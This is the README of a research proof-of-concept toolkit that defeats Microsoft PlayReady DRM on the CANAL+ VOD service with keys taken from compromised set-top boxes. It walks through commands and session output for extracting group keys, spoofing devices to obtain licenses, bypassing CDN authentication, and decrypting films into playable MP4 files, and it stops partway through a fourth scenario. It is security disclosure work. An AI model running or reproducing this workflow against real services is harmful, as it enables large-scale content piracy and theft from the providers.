``` # MS Play Ready / Canal+ VOD toolkit # (c) Security Explorations 2016-2019 Poland # (c) AG Security Research 2019-2022 Poland ``` # INTRODUCITON This Proof of Concept demonstrates weak content protection in the environment of CANAL+ (Microsoft PlayReady DRM case). The goal of this research is not to promote PayTV piracy in any way. It is to both increase awareness and trigger more work on the vendors involved to make PayTV piracy harder to accomplish. The results obtained indicate that there is much space for the improvement through better technical means. # BASE RESEARCH The POC exploits 3 years old vulnerabilities in CANAL+ STB devices, which make it possible to gain code execution access to target STB devices over IP network. Full technical details of the vulnerabilities along POC codes have been published in 2019 (SRP-2018-02 project). These demonstarted the following among others: - fully privileged runtime access to set-top-box SW (middleware, kernel), - compromise of ST DVB chipset (and its keys), - compromise of ADB DRM key storage. The said details can be found in SRP-2018-02-report.pdf file included as part of this research. # RATIONALE FOR FURTHER RESEARCH In 2019, I made a claim that Microsoft PlayReady content protection mechanism in use by NC+ GO (predecessor of CANAL+ VOD service) did not matter much in a context of a demonstrated set-top-box compromise. Some of the rationale behind my reasoning was made given with respect to several key features of Microsoft Play Ready. Below, the reasons for why I believe they do not matter in the context of a full STB compromise are provided: - Secure License Delivery License delivery is protected by an asymmetric cryptography. Access to STB makes it possible to issue arbitrary license requests to a license server with the use of a compromised set-top-box RSA key. - Key Rotation Rotated keys are delivered to the compromised STB device. - Output Protection Complete control over STB software means any policy restrictions enforced for a played content can be bypassed. - Metering The count of how many times a given content can be played is irrelevant as it only takes one time to successfully decrypt it / store it to file for later use and/or distribution. - Breach Response It's difficult to detect a breach for a device mimicking a completely legitimate one. The detection of a breach may happen at a later time and only if the decrypted content contains watermarked (STB specific watermarks injected at the time of packaging the content). The description of redGalaxy Coder used by a 3rd party CDN does not mention support for watermarking, the watermarking app is likely used solely on STB. Since MS PlayReady technology was used to protect premium content in the environment of SAT TV provider, we inquired Microsoft in order to learn if MS PlayReady could be impacted in any way by my research (whether it could provide any content protection in case of a demonstrated, complete STB compromise). The following inquiry was sent to Microsoft in order to learn whether its technology could be affected by a security vulnerability in the underlying ST chipset (among others): - has MS Play Ready technology been used properly in the environment of NC+ SAT TV operator to protect PayTV content of premium content providers such as HBO, Disney and Canal+ ? - does MS Play Ready provide proper (any) security of content if the underlying set-top-box chipset (such as STi7111) is compromised (its keys are compromised) ? - will Microsoft allow continuous use of MS Play Ready technology in the environment of NC+ and / or ITI-2851ST set-top-box device ? - did NC+ or set-top-box vendor (ADB) violate any agreement signed with Microsoft regarding the use of MS Play Ready technology ? I received no response from Microsoft. In Mar 2022, I discovered that no changes have been made to the STB software and associated secrets. This include the following: - no vulnerabilities have been fixed, - no changes to PlayReady binary (`libstd_cai_client_drm_msplayready.so`) have been made, - no certificates have been revoked (PlayReady group cert and private key, STB certificate used to connect to CANAL+ VOD services), - no changes have been made to CANAL+ VOD service (same secrets, client side security for content access). I started to wonder for the reasons of no response / no action from Microsoft in particular, That was unusual for taking into account that Microsoft does a lot to maintain good relationships with a security research community (through private events such as Blue Hat, Bug Bounty programs, etc.). Could it be that there has been something I missed in 2019 that Microsoft knew about and that made all my claims invalid / bogus (that Microsoft didn't care about the impact of STB compromise PlayReady relied on) ? Could Microsoft be so confident of the outstanding security of this technology that the company did not care about a single STB compromise ? The only way to verify that was to investigate security of Microsoft PlayReady content protection implementation in the environment of CANAL+. # BRIEF SUMMARY It is important to state that the whole research was conducted completely from scratch. Prior to it, no knowledge of: - any other DRM or content protection mechanism (such as Widevine, etc.) was known. - any A/V streaming mechanism used by PayTV / VOD platforms was known, - ECC cryptography operation (so far there was no need to learn it for me as I usually found other ways to break stuff) could be assumed at my end, - MPEG-4 specification along the role of audio and video codecs for it was known. In short, the starting point for the research has been the following: - compromised STB device (not patched by CANAL+ since 2019, with over-the-air SW upgrade date of 2022-01-26 10:10:00), - access to libstd_cai_client_drm_msplayready.so binary. The following steps were taken to complete the research (among others): 1. Microsoft published information about PlayReady was used to gain more insight into the technology (specs, docs), 2. libstd_cai_client_drm_msplayready.so binary has been analyzed in a static manner under IDA Pro (pure, old school reverse engineering), 3. my exploit tool from 2019 has been extended to implement dynamic tracing of specific DRM / PlayReady functions (to create traces of given function execution, dump registers and memory content at function entry and / or exit), all done as a response to an attempt to play DRM protected content sample traces are included in this distribution (`reversing/api_traces` directory) 4. the exploit tool was slightly modified to act in a remote fashion and be more easy to use (target IP sufficient along a few params to compromise a box), 5. an entry work into ECC crypto was performed with a focus on various ways to optimize its implementation (Montgomery ladder, mappings into spaces, etc.), this resulted in a custom ECC library, which could be used to verify data gathered in steps 1-3 6. a custom function was implemented to trigger on demand initialization of DRM client device (to investigate ECC implementation, implement custom ECC code at the same time, compare results of various functions), 7. a custom command was implemented to fetch plaintext values of certificates and keys used by PlayReady code (group cert, private group key), these were held in encrypted file system (ordinary fs access fetched encrypted files), 8. fake DNS / VOD server was used to sniff for HTTP requests to the license server and CDN network (request format, HTTP headers), these servers were embedded into the exploit tool, 9. an entry work into MPEG-4 file format was conducted, this resulted in some custom MPEG-4 file handling (parsing) code, which turned out to be useful to investigate the layout of encrypted fragments too, debug the content of constructed MPEG-4 files, etc. 10. sample MPEG-4 files published by Microsoft (PlayReady test server samples) were used to see which MPEG-4 boxes were crucial for building fragments into a single, playable MPEG-4 file. # IMPACT The research showed that Microsoft PlayReady content security implemented in SW and on a client side constitutes a significant risk for content providers. More specifically, the research proves that one compromised device (compromise of DRM client secrets) is completely sufficient to accomplish that. The POC illustrates the following (among others): - the ability to acquire license to content by spoofing real STB device or by mimicking a completely fake one, - the ability to download premium content from Canal+ CDN, decrypt it and build a single movie file ready to watch (or distribute over the Internet). - bad approach to PlayReady integration with STB device (no use of hardware capabilities, no isolation of DRM secrets from STB application code). - that no watermarking is implemented by CANAL+ / CDN side, The real case of CANAL+ shows that their database of movies containing more than 18k assets (including HBO, CANAL+, FOX libraries) could be compromised. Finally, several issues have been identified in the operation of the PlayReady licensing mechanism. # TOOL DESCRIPTION The tool makes use of several modules to implement specific functionality. These are the following: - `cdn` - the module for acquiring data from a Content Delivery Network (CDN) - `mspr` - base module implementing Microsoft Play Ready functionality such as Manifest parsing, device certificate generation, license request and response generation, license acquisition, MPEG-4 file format parsing and building and encrypted files decryption - `vod` - the module enabling browsing of CANAL+ library and acquisition of the asset information needed by `mspr` module - `cgaweb` - the module implementing basic functionality illustrating issues related to CANAL+ VOD ordering service Each module is initialized with the help of `Init` class. This class contains information about the commands implemented by the module. As such, `Init` class should be treated as the initial code location whenever specific module command implementation needs to be investigated. ## DIRECTORY STRUCTURE The tool follows directory structure described below: `content` - the base directory for content assets, each of the subdirectory represents content asset `content\someassetid` - the asset directory containing base information about given asset (manifest url, license server url, audio and video fragments) `secrets` - the directory holding secrets acquired from a vulnerable set-top-box device `src` - main source code directory `src\mod` - directory where source code for tool modules can be found `classes` - temporary directory where output classes get generated `scripts` - the scripts directory ### ASSETS DIRECTORY STRUCTURE Each asset saved to local DB follows the following structure: `DEFINITION FILES` These are the files, which are required to download, obtain license and build MPEG-4 files for assets. `url.txt` - the file containing url to asset manifest file `ls.txt' - the file containing license server url `Info.json` - the file containing description of the asset (title, duration) `DOWNLOADED FILES` `Manifest.ism` - the manifest file for this asset `audio\*AUDIONAME*\q*LEVEL* - directory where encrypted audio data fragments for audio track *AUDIONAME* and quality level *LEVEL* get downloaded `video\q*LEVEL* - directory where encrypted video data fragments for quality level *LEVEL* get downloaded `debug` - directory where license server request and response is store for inspection (`getlicense` command) ## BUILDING The tool was developed in a Java language. As such it requires Java compiler and Java language runtime for building (compilation) and execution. Prior to that, `config.bat` file needs to be edited so that the `javadir` variable points to the directory location where Java JDK/SDK can be found: ``` @echo off set javadir="c:\_SOFTWARE\jdk11.0.15_9" set modules=mspr cdn vod cgaweb ``` Building the toolkit can be done by running `build.bat` script: ``` c:\_RESEARCH\_CANALP\2022\code>build *** Compiling source files *** src\helpers\Web.java:38: warning: MessageHeader is internal proprietary API and may be removed in a future release public static class CleanMessageHeader extends MessageHeader { ^ Note: Some input files use unchecked or unsafe operations. Note: Recompile with -Xlint:unchecked for details. 1 warning *** Preparing jar files *** *** cleaning temporary files *** ``` ## STARTING The tool can be started by running `shell.bat` script: ``` c:\_RESEARCH\_CANALP\2022\code>shell # MS Play Ready / Canal+ VOD toolkit # (c) Security Explorations 2016-2019 Poland # (c) AG Security Research 2019-2022 Poland loaded cdn [CDN helper] loaded mspr [MS Play Ready toolkit] loaded vod [CANALP VOD toolkit] loaded cgaweb [CANALP CGAWeb toolkit] ``` Upon tool startup, the commands included in the `init.scr` script from the `scripts` directory gets automatically executed. The initialization script is used to set several configuration variables and to load tool modules. ## PREDEFINED VARIABLES The following variables have been implemented by the tool: `CONTENT_DIR` - it denotes the content directory `SERIAL` - it denotes STB serial number `MAC` - it denotes STB network MAC address `SCARD` - the id of a smartcard (CANAL+ subscriber identifier) `SECLEVEL` - MS Play Ready security level used for client certificate and license acquisition `VOD_SECRET` - it denotes the secret used by CANAL+ CDN network `VOD_URL` - it denotes the base url for CANAL+ VOD `KSFILE` - Java Key Store file with STB certificate used to connect to CANAL+ `KSPASSFILE` - password to Java Key Store file with STB certificate used to connect to CANAL+ VOD services `MSPR_DEBUG` - it implicates that a fixed device identity and certificate is used (fixed random and ECC values in particular) `MSPR_LOCAL_LICENSE` - it denotes the local file from which to read the license from (the license file should be obtained with the use of a fixed identity) `MSPR_FAKE_ROOT` - it denotes that a custom (fake) certificate chain should be used in place of a group cert file `CDN_NOAUTH` - it implicates that a random value ise used instead of the auth cookie for content data requests (CDN requests) `ASSETID` - helper variable used to indicate the asset identifier to use for commands that require it (`-A` argument) ## COMMANDS DESCRIPTION The list of all commands can be obtained with the use of `help` command. For each command, brief information about the arguments taken is displayed. Below, more details regarding each command is given: - show available commands with brief arguments' description ``` help [cmd] ``` - redirect shell output to file (or back to console) ``` output console|filename ``` - declare variable of a given name and type ``` var varname str|int ``` - set the value of a given variable ``` set [varname|varname value] ``` - enable / disable echo ``` echo on|off ``` - print a line to the output containing argument ``` print arg1 arg2 ... argn ``` - run commands defined in a script file ``` run arg1 arg2 ... argn ``` - check the number of arguments provided to the script or variable definition break execution and report error if condition is not satisfied ``` assert -a argnum|-v varname [-e errormsg] ``` - load or check status of a loading for a given named module ``` mod module ``` - pure test command ``` test arg ``` - issue `HEAD` HTTP request for a given URL and inspect returnd headers ``` urlcheck url ``` - issue `GET` HTTP request for a given URL and dowload returned data to file ``` urlfetch url outputfile ``` - print device identity information ``` device ``` - print Microsoft Play Ready private ECC group key ``` grpkey ``` - print Microsoft Play Ready group certificate ``` grpcert ``` - print Microsoft Play Ready device identity certificate ``` devcert ``` - print Microsoft Play Ready device identity certificate chain (the one used for the license acqusition) ``` devchain ``` - show information from manifest file of a given asset id (MPEG-4 streams and codec information, content protection information such as key id and algorithm) ``` maninfo [-A assetid] ``` - issue `HEAD` HTTP request for a manifest URL and inspect returnd headers ``` urlinfo [-A assetid] ``` - get license for a given asset id and obtain content key, this can be done by issuing a license to license server or by loading a license server response from a file (`MSPR_LOCAL_LICENSE` variable) ``` getlicense [-A assetid] ``` - build standalone MPEG-4 file from fragments downloaded for a given asset id, the fragments get decrypted with the use of a content key, the audio and video stream parameters specify quality to use, the tiem description specifies the start and end time (in seconds) for the created file ``` makemp4 [-A assetid] -a audiostream -v videostream -t timedesc ``` - download fragments for a given asset id, the fragments get downloaded with rspect to the audio and video stream parameters specifying quality, the time description specifies the start and end time (in seconds) for the download ``` downmp4 [-A assetid] -a audiostream -v videostream -t timedesc ``` - show information about a given asset (id, tile, manifest and license server urls) ``` assetinfo [-A assetid] ``` - dump information from a given MPEG-4 file, the `-b` argument denotes the box path to limit the dump to ``` mp4dump [-f file][-v][-b path] ``` - shows (and verifies status) of the secrets used by the toolkit ``` secrets ``` - dump infomration from a binary Play Ready certificate ``` bcertinfo bcertfile ``` - shows the available collections in CANAL+ VOD ``` vodinfo ``` - shows information about given CANAL+ VOD collection ``` colinfo coluniqueid ``` - list assets available in a given CANAL+ VOD collection, the `pagecnt` argument limits the number of pages to list the assets from (0 is for all assets) ``` lscol coluniqueid [pagecnt] ``` - print information about a given collection asset ``` colasset assetid ``` - store basic information about a given asset (manifest url, license server url and JSON info file) to the content directory for use by other commands (such as `maninfo`, `getlicense`, `downmp4` and `makemp4`) ``` storeasset assetid ``` - checks whether CDN content is watermarked, for the purpose of a check access to CDN data is made with the use of different device identifiers, the `fragment_idx` param indicates the fragment to verify for, the `quality` is the index of the stream ``` checkwatermark [-A assetid][-i fragment_idx][-q quality] ``` - extracts MS PlayReady secrets from the main binary with the use of a device root key (compromised root key) ``` extractsecrets playreadybinary ``` ## SAMPLE USE (PROBLEMS ILLUSTRATION) Below, several scenarios are provided that demonstrates weak content protection in the environment of CANAL+ (Microsoft PlayReady DRM case). ### SCENARIO 1 (STB SECRETS SUFFICIENT FOR A STEALTH PIRACY OF CONTENT) The following commands illustrate the scenario where a PlayReady license for arbitrary movie from a CANAL+ VOD library can be obtained and the movie (or its designated part) be downloaded in plaintext to a single, ready to play (or to distribute over Internet) file. - check status of the secrets acquired from STB ``` msprcp> secrets z1 - PlayReady private group key [OK] g1 - PlayReady group certificate [OK] stb-cert.jks - set-top-box certificate [OK] stb-cert.pwd - set-top-box certificate password [OK] ``` - browse CANAL+ VOD library ``` msprcp> vodinfo [VOD LIBRARY] COL01 "PREMIERY VOD+" [Film] COL02 "CANAL+ Premium" COL03 * "ALE KINO+" COL04 "Movies Fun" COL05 "FOX PLAY" COL06 "FilmBox Live" COL07 "AXN NOW" COL08 "KINO ĹšWIAT" COL09 * "ROMANCE TV" COL0a * "NOVELAS+" COL0b "EPIC DRAMA" COL0c * "KINO POLSKA" COL0d "SUNDANCE TV" COL0e * "TVN" COL0f "SCIFI" COL10 * "13 ULICA" COL11 "BBC FIRST" COL12 "KINO TV" COL13 "AMC" COL14 "Warner TV" COL15 * "BBC PLAYER" COL16 "COMEDY CENTRAL" COL17 "POLSAT COMEDY CENTRAL EXTRA" COL18 "CBS EUROPA" COL19 "FOX" COL1a "CANAL+ SERIALE EXTRA" COL1b "HBO" [Dzieci] COL1c * "BAJKI PO UKRAIĹ?SKU" COL1d "CANAL+ Kids" COL1e * "MINIMINI+" COL1f "TeenPlay" COL20 * "TELETOON+" COL21 "DISNEY CHANNEL" COL22 "DISNEY JUNIOR" COL23 "DISNEY XD" ... [4K] COL4e "PREMIERY VOD+ 4K" COL4f "CANAL+4K" COL50 "BBC Studios" COL51 "BBC EARTH 4K" ``` Collections marked with `*` character are those to, which the defined smart card value (`SCARD` variable) is allowed to access. - show information about kids (Dzieci) movie collection ``` msprcp> lscol COL1e 2 ASSETS from 2/74 pages ctitmim568003 "Barbie: Akademia Ksi─Ö┼╝niczek" ctitmim597698 "Barbie: Delfiny z Magicznej Wyspy" ctitmim603561 "Barbie: Dreamhouse Adventures 2 odc. 10" ctitmim604164 "Barbie: Dreamhouse Adventures 2 odc. 11" ctitmim602516 "Barbie: Dreamhouse Adventures 2 odc. 2" ctitmim602553 "Barbie: Dreamhouse Adventures 2 odc. 3" ctitmim602563 "Barbie: Dreamhouse Adventures 2 odc. 4" ctitmim602585 "Barbie: Dreamhouse Adventures 2 odc. 5" ctitmim602791 "Barbie: Dreamhouse Adventures 2 odc. 6" ctitmim602977 "Barbie: Dreamhouse Adventures 2 odc. 7" ctitmim603541 "Barbie: Dreamhouse Adventures 2 odc. 8" ctitmim603550 "Barbie: Dreamhouse Adventures 2 odc. 9" ctitmim577795 "Barbie: Dreamhouse Adventures odc. 1" ctitmim579295 "Barbie: Dreamhouse Adventures odc. 10" ctitmim577831 "Barbie: Dreamhouse Adventures odc. 11" ctitmim577835 "Barbie: Dreamhouse Adventures odc. 12" ctitmim578208 "Barbie: Dreamhouse Adventures odc. 13" ctitmim578209 "Barbie: Dreamhouse Adventures odc. 14" ... ctitmim529714 "Bing - 33 - Buu" ctitmim529719 "Bing - 34 - M├│wi taxi" ctitmim529722 "Bing - 35 - Latawiec" ctitmim529730 "Bing - 36 - Wi─Öcej" ctitmim529732 "Bing - 37 - Czarodziejski blask" ctitmim529720 "Bing - 38 - Drzewo" ctitmim529723 "Bing - 39 - Gdzie jest Flop?" ctitmim529744 "Bing - 40 - Śniadani├│wka" ctitmim531739 "Bing - 41 - Nocowanie" ``` - show information about collection asset `ctitmim529714` ``` msprcp> colasset ctitmim529714 ctitmim529714 "Bing - 33 - Buu" link: https://nvs1.ncplus.pl/go-stb/static/stb_content.json?productId%3D529714 ls_url: https://lsp1.ncplus.pl/kms/proxy ``` - store information (manifest and license server url) about asset `ctitmim529714` `ctitmim529714` to local DB ``` msprcp> storeasset ctitmim529714 asset data stored to: content\ctitmim529714 ``` - show asset `ctitmim529714` information as visible in a local DB ``` msprcp> assetinfo -A ctitmim529714 ASSET id: ctitmim529714 title: Bing - 33 - Buu title_original: Bing - 33 allow: 30.11.2022 year: 2014 duration: 7 min url: http://r.cdn-ncplus.pl/ncplusgo04-voddrm01/MiM_74011213/MiM_74011213.ism/Manifest ``` - show manifest information for asset `ctitmim529714` ``` msprcp> maninfo -A ctitmim529714 MANIFEST: content\ctitmim529714\Manifest.ism SmoothStreamingMedia MajorVersion: 2 MinorVersion: 0 TimeScale: 10000000 Duration: 4400000000 [0h 7m 20s] ProtectionHeader SystemID: 9A04F079-9840-4286-AB92-E65BE0885F95 WRMHEADER keylen: 16 algid: AESCTR kid 0000: 04 25 01 44 01 78 12 4f a5 51 56 ca f9 7a 2f f5 .%.D.x.O.QV..z/. la_url: https://api-ncplus.drm.insyscd.net/rightsmanager.asmx ds_id: 0000: 79 f0 04 9a 40 98 86 42 ab 92 e6 5b e0 88 5f 95 y...@..B...[.._. StreamIndex Type: audio Name: Oryginalny TimeScale: 10000000 Chunks: 220 QualityLevels: 1 Url: QualityLevels({bitrate})/Fragments(Oryginalny={start time}) QualityLevel Index: 0 Bitrate: 125417 FourCC: AACL CodecPrivateData: 1190 SamplingRate: 48000 Channels: 2 BitsPerSample: 16 PacketSize: 4 AudioTag: 255 StreamIndex Type: audio Name: Polski TimeScale: 10000000 Chunks: 220 QualityLevels: 1 Url: QualityLevels({bitrate})/Fragments(Polski={start time}) QualityLevel Index: 0 Bitrate: 125418 FourCC: AACL CodecPrivateData: 1190 SamplingRate: 48000 Channels: 2 BitsPerSample: 16 PacketSize: 4 AudioTag: 255 StreamIndex Type: text Name: text-1 TimeScale: 10000000 Chunks: 8 QualityLevels: 1 Url: QualityLevels({bitrate})/Fragments(text-1={start time}) StreamIndex Type: video Name: video TimeScale: 10000000 Chunks: 220 QualityLevels: 5 Url: QualityLevels({bitrate})/Fragments(video={start time}) QualityLevel Index: 0 Bitrate: 400000 FourCC: AVC1 CodecPrivateData: 000000016742C015D901E08FEB01100000030010000003032E200030D400086478A8C01E2C5C900000000168CB8DC8 MaxWidth: 480 MaxHeight: 270 ``` - get license for asset `ctitmim529714` ``` msprcp> getlicense -A ctitmim529714 -- loading cached manifest -- generating license req XML key (AES/CBC) iv 0000: 48 69 b8 f5 a3 dc 1c ee 30 ea 2c 04 5d de 6e c5 Hi......0.,.].n. key 0000: 57 7c 79 ad fd 93 be 07 c3 d9 09 e9 27 87 ed 8a W|y.........'... nonce 0000: 6d 51 28 2a d8 c5 1a a7 cc 34 2f 03 1c 89 45 34 mQ(*.....4/...E4 NONCE bVEoKtjFGqfMNC8DHIlFNA== KEYDATA /3xTymd6IO+C5+3oQgJT6FF6WaDGGs83MwOn3s1NI3PqZH7VPlTy3ZBxKT6+fRvRLa02Z5UvOBgCwlavlR2XFeaIQdwTUkP93T6ikwDWZXUWRvCUefpL1boUANTCok0z1slCtadY7se7ECHRz2BxenhcAfSTxmP+p1hoxNu+07A= XML DIGEST HVyLLu1ogxnqzip5Tx6wf5uzEB/XxUoeZRY0cTdAmlA= ecdsa digest 0000: 7e c1 ad 61 42 71 9a 25 9d 90 9a f0 48 c5 c3 44 ...aBq.%....H..D 0010: e6 9c 60 da 98 ec 78 3b 21 6e 9c 1c dd 33 e3 96 ......x;!n...3.. signature -- r: 277ca8d09a8e5ceedb15c07e73acd8da0bfafcfedb683718b4f5e60cea0f72a6 -- s: 607e500df0bc09ce890110d9f6d214ecb2d6027268ea9135f9a66d44e778c7b1 XML SIGNATURE J3yo0JqOXO7bFcB+c6zY2gv6/P7baDcYtPXmDOoPcqZgflAN8LwJzokBENn20hTsstYCcmjqkTX5pm1E53jHsQ== PUBKEY HzRT52jiTwqGPAJgLRfkJM8Sj5ZrbSmnvnHxFInleK13N17+uumT8bvzebJ/HggAhv0bMOTPMzaCzKLiuO+coQ== -- sending license req to: https://lsp1.ncplus.pl/kms/proxy LICENSE CUSTOM DATA UserToken: 135abf9b-7006-46f2-9b3f-52f5d79f361a-stb BrandGuid: 448ab54c-d127-45f6-b651-4c59aee2f431 LicenseType: NonPersistent BeginDate: 2022-06-27T10:29:41.2331761 ExpirationDate: 2022-06-29T10:29:41.2331761 ErrorCode: 0 TransactionId: auto:56 XMR LICENSE version: 3 attr: 0001 OuterContainer attr: 0036 Unknown data 0000: 00 00 00 39 00 00 00 18 d8 27 66 78 a6 c2 be 44 ...9.....'fx...D 0010: 8f 88 08 ae 25 5b 01 a7 ....%[.. attr: 0002 GlobalContainer attr: 000d Unknown data 0000: 00 01 .. attr: 0032 DWORD_Versioned data 0000: 00 00 00 40 ...@ SecurityLevel level: SL2000 attr: 0009 KeyMaterialContainer ContentKey key_id 0000: 04 25 01 44 01 78 12 4f a5 51 56 ca f9 7a 2f f5 .%.D.x.O.QV..z/. v1: 1 v2: 3 enc_data_len: 0080 enc_data 0000: 4d 6e 63 6a 80 5d ea a2 20 e4 5f dc 1b 3a b8 07 Mncj.]...._..:.. 0010: 84 c5 d5 0c 91 37 69 6e 94 71 b6 0c 1a 20 f0 de .....7in.q...... 0020: 24 79 38 8a 04 b0 02 e8 d2 4c fb 19 4d 24 b5 7e $y8......L..M$.. 0030: e5 08 12 f3 28 46 76 82 43 13 34 20 d3 01 15 61 ....(Fv.C.4....a 0040: 03 04 71 a9 19 a5 98 c3 43 67 42 1e 5a 50 5e 8c ..q.....CgB.ZP^. 0050: ac bf b4 c6 af b6 6d 58 7a c9 7a 3d 41 a2 d0 cb ......mXz.z=A... 0060: dd 76 04 fd b5 02 2c 07 11 65 d6 53 0f 03 5c 66 .v....,..e.S...f 0070: e2 45 09 eb 0b 49 e2 db 99 9a d7 44 ce aa 8e e5 .E...I.....D.... attr: 002a ECCDeviceKey data 0000: 00 01 00 40 d2 96 26 1e 5f 0b f2 4c c0 73 4d 76 ...@..&._..L.sMv 0010: c8 10 ac ef 7b 49 2c 16 04 07 8a 51 9c 6f 54 58 ....{I,....Q.oTX 0020: 6c bf be df ea a2 6c f7 29 cc 0f 74 75 d2 20 bd l.....l.)..tu... 0030: cf 64 fa 69 fa 9e f2 80 c5 66 f0 83 c3 a0 80 d5 .d.i.....f...... 0040: 70 df ca 0d p... attr: 000b Signature data 0000: 00 01 00 10 46 f5 e0 76 c1 87 f6 89 8d a7 cd e7 ....F..v........ 0010: be ad a6 64 ...d content_key 0000: *REMOVED* ``` - download fragments for time window 0 to 4s for asset `ctitmim529714` (lowest quality 0, audio track `Oryginalny`) ``` msprcp> downmp4 -A ctitmim529714 -a audio=Oryginalny.0 -v video=0 -t 0+4 -- parsing args audio name: Oryginalny audio quality: q0 video quality: q0 -- loading cached manifest start time: 0 sec duration: 4 sec Downloading 3 fragments [###############################] ``` - inspect the contents of MPEG-4 audio fragment 0 for asset `ctitmim529714` ``` msprcp> mp4dump -f content\ctitmim529714\audio\Oryginalny\q0\0 ### FILE: content\ctitmim529714\audio\Oryginalny\q0\0 box: 0 MP4 FILE len: 00007f7e box: 1 moof [Movie Fragment Box] len: 000004d0 box: 0 mfhd [Movie Fragment Header Box] box: 2 traf [Track Fragment Box] len: 000004b8 box: 3 tfhd [Track Fragment Header Box] box: 3 trun [Track Fragment Run Box] box: 3 SampleEncryptionBox [Usertype Box] box: 1 mdat [Media Data Box] ``` - inspect the contents of SampleEncryptionBox (AES IV vector) for MPEG-4 audio fragment 0 for asset `ctitmim529714` ``` msprcp> mp4dump -f content\ctitmim529714\audio\Oryginalny\q0\0 -b moof.traf.Samp leEncryptionBox box: 3 SampleEncryptionBox [Usertype Box] len: 00000308 flags: 00000000 sample_cnt: 0000005e IV 0000 0000: 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 ................ IV 0001 0000: 00 00 00 04 00 00 00 01 00 00 00 00 00 00 00 00 ................ IV 0002 0000: 00 00 00 04 00 00 00 02 00 00 00 00 00 00 00 00 ................ IV 0003 0000: 00 00 00 04 00 00 00 03 00 00 00 00 00 00 00 00 ................ IV 0004 0000: 00 00 00 04 00 00 00 04 00 00 00 00 00 00 00 00 ................ ... ``` - create single, plaintext, ready to play MPEG-4 file for time window 0 to 4s for asset `ctitmim529714` (lowest quality 0, audio track `Oryginalny`) ``` msprcp> makemp4 -A ctitmim529714 -a audio=Oryginalny.0 -v video=0 -t 0+4 -- parsing args audio name: Oryginalny audio quality: q0 video quality: q0 -- loading cached manifest start time: 0 sec duration: 4 sec audio track id: 4 video_track_id: 2 -- loading cached content key Processing (decrypt / append) 3 fragments [###############################] total A/V data: 393844 ``` The output MPEG-4 file is saved to in `content\ctitmim529714\movie.mp4` file. - inspect the contents of generated `movie.mp4` file ``` msprcp> mp4dump -f content\ctitmim529714\movie.mp4 ### FILE: content\ctitmim529714\movie.mp4 box: 0 MP4 FILE len: 00060730 box: 1 ftyp [File Type Box] box: 1 moov [Movie Box] len: 0000049c box: 2 mvhd [Movie Header Box] box: 2 trak [Track Box] len: 000001be box: 3 tkhd [Track Header Box] box: 3 mdia [Media Box] len: 0000014e box: 4 mdhd [Media Header Box] box: 4 hdlr [Handler Reference Box] box: 4 minf [Media Information Box] len: 000000f4 box: 5 smhd [Sound Media Header Box] box: 5 dref [Data Reference Box] box: 5 stbl [Sample Table Box] len: 000000b8 box: 6 stts [Decoding Time to Sample Box] box: 6 ctts [Composition Time to Sample Box] box: 6 stsc [Sample To Chunk Box] box: 6 stsz [Sample Size Boxes] box: 6 stco [Chunk Offset Box] box: 6 stsd [Sample Description Box] box: 2 trak [Track Box] len: 000001fa box: 3 tkhd [Track Header Box] box: 3 mdia [Media Box] len: 0000018a box: 4 mdhd [Media Header Box] box: 4 hdlr [Handler Reference Box] box: 4 minf [Media Information Box] len: 00000130 box: 5 smhd [Sound Media Header Box] box: 5 dref [Data Reference Box] box: 5 stbl [Sample Table Box] len: 000000f4 box: 6 stts [Decoding Time to Sample Box] box: 6 ctts [Composition Time to Sample Box] box: 6 stsc [Sample To Chunk Box] box: 6 stsz [Sample Size Boxes] box: 6 stco [Chunk Offset Box] box: 6 stsd [Sample Description Box] box: 2 mvex [Movie Extends Box] len: 00000054 box: 3 mehd [Movie Extends Header Box] box: 3 trex [Track Extends Box] box: 3 trex [Track Extends Box] box: 1 moof [Movie Fragment Box] len: 000004d0 box: 0 mfhd [Movie Fragment Header Box] box: 2 traf [Track Fragment Box] len: 000004b8 box: 3 tfhd [Track Fragment Header Box] box: 3 trun [Track Fragment Run Box] box: 3 uuid_28632920414753656352657332303232 [Usertype Box] box: 1 mdat [Media Data Box] box: 1 moof [Movie Fragment Box] len: 000007e6 box: 0 mfhd [Movie Fragment Header Box] box: 2 traf [Track Fragment Box] len: 000007ce box: 3 tfhd [Track Fragment Header Box] box: 3 trun [Track Fragment Run Box] box: 3 uuid_28632920414753656352657332303232 [Usertype Box] box: 1 mdat [Media Data Box] ... ``` ### SCENARIO 2 - NO WATERMARKING FOR CDN CONTENT The CDN serves static, encrypted content. There is no watermarking implemented by it as indicated by the following toolkit test: ``` msprcp> checkwatermark -- loading cached manifest -- downloading video fragment 0 url: http://n-15-22.dcs.redcdn.pl/webcache/canalplus/ncplusgo04-voddrm01/MiM_54018035/MiM_54018035.ism/QualityLevels(400000)/Fragments(video=0) download res for serial DGBD18304072851C9 : 86313 bytes download res for serial DGBD9C15827040381 : 86313 bytes -- same data [LIKELY NO WATERMARK] ``` The above command fetches arbitrary video fragment with the use of different serial numbers. CDN returns same content for request mimicking different STB devices. ### SCENARIO 3 - WEAK AUTH FOR CONTENT DOWNLOAD One of the requests used in Scenario 2 was issued with the use of a fake STB serial number (original serial "reverted"). This implicates weak authentication done for content access. ALthough CDN network relies on: - `VOD_SECRET` value defined by the VOD web application, - the secret algorithm for `X-nBox-Code` cookie calculation, these do not matter though as the random value used in place of `X-nBox-Code` code be successfully used to get access to CDN content. This is illustrated below: ``` c:\_TRANSFER\MSPRNCP\toolkit>shell # MS Play Ready / Canal+ VOD toolkit # (c) Security Explorations 2016-2019 Poland # (c) AG Security Research 2019-2022 Poland loaded cdn [CDN helper] loaded mspr [MS Play Ready toolkit] loaded vod [CANALP VOD toolkit] loaded cgaweb [CANALP CGAWeb toolkit] msprcp> set CDN_NOAUTH 1 msprcp> downmp4 -A ctitnod570826 -a audio=Polski.0 -v video=0 -t 1:0+4 - parsing args audio name: Polski audio quality: q0 video quality: q0 - loading cached manifest start time: 60 sec duration: 4 sec Downloading 3 fragments [###############################] msprcp> makemp4 -A ctitnod570826 -a audio=Polski.0 -v video=0 -t 1:0+4 - parsing args audio name: Polski audio quality: q0 video quality: q0 - loading cached manifest start time: 60 sec duration: 4 sec audio track id: 2 video_track_id: 1 - loading cached content key Processing (decrypt / append) 3 fragments [###############################] total A/V data: 409605 msprcp> ``` ### SCENARIO 4 - NO SYNC OF CDN WITH PLAYREADY LICENSE SERVER The license acquired in Scenario 1 indicated expiration date of 2022-06-29: ``` CUSTOM DATA UserToken: 135abf9b-7006-46f2-9b3f-52f5d79f361a-stb BrandGuid: 